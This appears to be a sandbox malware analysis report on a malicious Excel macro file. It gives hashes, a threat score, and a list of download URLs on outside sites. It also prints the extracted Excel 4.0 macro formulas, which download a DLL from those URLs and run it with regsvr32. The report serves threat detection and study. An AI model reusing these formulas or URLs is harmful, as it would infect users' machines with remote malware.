Overview

overview

10

Static

static

10

3b7cf81357...2.xlsm

windows7-x64

10

3b7cf81357...2.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    3b7cf8135798d8a633f0ce97a852372edc47b3ee7ddf77dfa3fd411597abc172

  • Size

    21KB

  • Sample

    241120-lwvznazlcr

  • MD5

    435309c2bfbaa26ec97f7351685c4cab

  • SHA1

    107b4cf4aee45673e7ee3f4b3e2f248bdc21a21a

  • SHA256

    3b7cf8135798d8a633f0ce97a852372edc47b3ee7ddf77dfa3fd411597abc172

  • SHA512

    43694143ec2247cbf0af2d60826fac3c91fba56e1317d070d1e8681aba7db578b7fb4c7a7982a24f7d2488dbdbfc4e643eb2ef6cc4cc5f613d89835274b4229d

  • SSDEEP

    384:fhuAi/NjZS8EibbwBlwegASYrLb5CzgObff9kC+xbX77NWu:ftsNxzXQFCBn9kC+xbL71

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://beetle-j.jp/wp-admin/ErM4mW05tdj/

https://brutobrasil.com.br/pdf/toO18cIP3/

http://e3technology.in/2checkout_integration_php/rDcr1Wl90WWA9M/

http://biesenbeek.nl/familie/b6KKlrfH75GD3dHojB/

http://bjornbol.dk/wp-includes/ve4cnkjsUMWXC5Cb2bJ/

http://bcelectronics.co.za/wp-content/grKnz1V/

http://bebesel.com.tr/cgi-bin/1wy3oHO/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://beetle-j.jp/wp-admin/ErM4mW05tdj/","..\rfs.dll",0,0) =IF('PCWV'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://brutobrasil.com.br/pdf/toO18cIP3/","..\rfs.dll",0,0)) =IF('PCWV'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://e3technology.in/2checkout_integration_php/rDcr1Wl90WWA9M/","..\rfs.dll",0,0)) =IF('PCWV'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://biesenbeek.nl/familie/b6KKlrfH75GD3dHojB/","..\rfs.dll",0,0)) =IF('PCWV'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bjornbol.dk/wp-includes/ve4cnkjsUMWXC5Cb2bJ/","..\rfs.dll",0,0)) =IF('PCWV'!G21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bcelectronics.co.za/wp-content/grKnz1V/","..\rfs.dll",0,0)) =IF('PCWV'!G23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bebesel.com.tr/cgi-bin/1wy3oHO/","..\rfs.dll",0,0)) =IF('PCWV'!G25<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://beetle-j.jp/wp-admin/ErM4mW05tdj/
xlm40.dropper

https://brutobrasil.com.br/pdf/toO18cIP3/
xlm40.dropper

http://e3technology.in/2checkout_integration_php/rDcr1Wl90WWA9M/

Targets

    • Target

      3b7cf8135798d8a633f0ce97a852372edc47b3ee7ddf77dfa3fd411597abc172

    • Size

      21KB

    • MD5

      435309c2bfbaa26ec97f7351685c4cab

    • SHA1

      107b4cf4aee45673e7ee3f4b3e2f248bdc21a21a

    • SHA256

      3b7cf8135798d8a633f0ce97a852372edc47b3ee7ddf77dfa3fd411597abc172

    • SHA512

      43694143ec2247cbf0af2d60826fac3c91fba56e1317d070d1e8681aba7db578b7fb4c7a7982a24f7d2488dbdbfc4e643eb2ef6cc4cc5f613d89835274b4229d

    • SSDEEP

      384:fhuAi/NjZS8EibbwBlwegASYrLb5CzgObff9kC+xbX77NWu:ftsNxzXQFCBn9kC+xbL71

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks